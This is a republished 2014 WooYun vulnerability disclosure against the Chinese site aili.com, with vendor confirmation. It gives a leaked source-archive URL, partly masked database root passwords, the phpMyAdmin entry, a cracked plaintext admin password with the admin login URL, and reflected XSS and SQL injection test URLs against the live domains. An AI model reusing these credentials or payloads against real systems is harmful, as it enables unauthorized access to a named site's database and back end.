[公开漏洞]爱丽网漏洞礼包(证明可影响主站数据库与后台)

    来源:WooYun 浏览:581次 时间:2014-06-29
爱丽网漏洞礼包(证明可影响主站数据库与后台) 相关厂商: aili.com 漏洞作者:鸟云厂商 提交时间:2014-05-15 16:01 公开时间:2014-06-29 16:01 漏洞类型:敏感信息泄露 危害等级:高 自评Rank:20 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: 敏感信息泄露 后台地址泄露 漏洞详情 披露状态:

2014-05-15:细节已通知厂商并且等待厂商处理中
2014-05-15:厂商已经确认,细节仅向厂商公开
2014-05-25:细节向核心白帽子及相关领域专家公开
2014-06-04:细节向普通白帽子公开
2014-06-14:细节向实习白帽子公开
2014-06-29:细节向公众公开

简要描述:

兖州交警真孬种!

详细说明:

#1 源代码泄露

http://www.aili.com.cn/aili.rar

1.jpg



全站源代码。

其中敏感配置文件:

/**

 * MySQL user

 *

 * @global string $cfg['Servers'][$i]['user']

 */

$cfg['Servers'][$i]['user'] = 'root';



/**

 * MySQL password (only needed with 'config' auth_type)

 *

 * @global string $cfg['Servers'][$i]['password']

 */

$cfg['Servers'][$i]['password'] = 'a*******7';



#2 Phpmyadmin配置文件泄露

在aili.rar\new\include下有配置文件config.php

$mydbhost = 'localhost';

$mydbuser ='root';

$mydbpwd = 'dk********(';

$mydbname = 'aili';



这里对应的是http://www.aili.com.cn/myadmin/index.php

登录之

2.jpg



SELECT * FROM `admin` LIMIT 0 , 30

找到了后台的账号密码md5,md5解密之,密码是ailiadmin

3.jpg



#3 进入后台

后台地址http://aili.com.cn/new/admin/login.php

4.jpg



对不起TAT 是我太没用,后台拿不了webshell

#4 XSS两个

http://member.aili.com/?c=member&m=room&a=del&id=='><script>alert(/XSS/)</script>



http://tag.aili.com/tag/get_index_aili_guan/?id==%27%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E



#5 sql注入

http://tag.aili.com/tag/get_index_aili_guan/?id=1%27



http://member.aili.com/?c=member&m=room&a=del&id=12



5.jpg



漏洞证明:

修复方案:

版权声明:转载请注明来源 鸟云厂商@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-05-15 16:22

厂商回复:

非常感谢 乌云厂商 对爱丽的厚爱,您提的漏洞我们会认真处理,并且会有礼品奉上!

最新状态:

暂无

上一篇: [公开漏洞]用友某站上传导致2W内部员工账号信息泄露
下一篇: [公开漏洞]国航某系统多处安全漏洞可导致源代码泄露
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细